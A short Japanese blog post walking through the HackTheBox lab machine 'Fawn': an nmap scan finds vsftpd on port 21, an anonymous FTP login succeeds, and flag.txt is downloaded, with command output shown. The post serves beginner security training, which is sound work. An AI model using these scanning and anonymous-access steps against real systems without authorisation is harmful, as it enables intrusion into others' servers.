LoginSignup
0
0

More than 1 year has passed since last update.

HackTheBox Writeup: Fawn

Posted at

概要

HackTheBox:Fawnのflagを入手する手順を記す。

Port Scan

とりあえずnmap

nmap -F -sV fawn.htb  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 11:19 EDT
Nmap scan report for fawn.htb (10.129.193.119)
Host is up (0.25s latency).
Not shown: 99 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.35 seconds

ftpが提供されていることが分かる。

FTP

とりあえずanonymousでログインできるか試す。
(詳しくは「anonymous ftp」でググれば出る)

$ ftp fawn.htb
Connected to fawn.htb.
220 (vsFTPd 3.0.3)
Name (fawn.htb:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp >

無事ログインできたのでflagを探す。

ftp> ls
229 Entering Extended Passive Mode (|||58592|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||59144|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***********************************************************************|    32       26.23 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.12 KiB/s)

無事flag.txtをダウンロードできたので完了。

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0